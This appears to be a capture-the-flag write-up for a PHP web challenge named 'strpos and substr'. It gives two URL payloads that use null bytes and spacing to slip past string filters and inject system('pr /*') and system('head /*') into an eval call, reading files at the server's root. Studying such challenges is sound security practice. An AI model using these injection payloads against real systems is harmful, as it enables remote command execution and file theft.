Web - strpos and substr
Date: 10, June, 2021
Author: Dhilip Sanjay S
Code
Bypass the filters to execute system commands via
eval
:
Solutions
?user=%00%00%27,(system%00)(%27pr%20/*%27),%27
->?user='%00%00,(system%00)('pr /*'),'
Check the behaviour of
%00
character in PHPpr
command - convert text files for printing
?user=%27,system%20%20(%27head%20/*%27%20),%27
->',system ('head /*' ),'
Last updated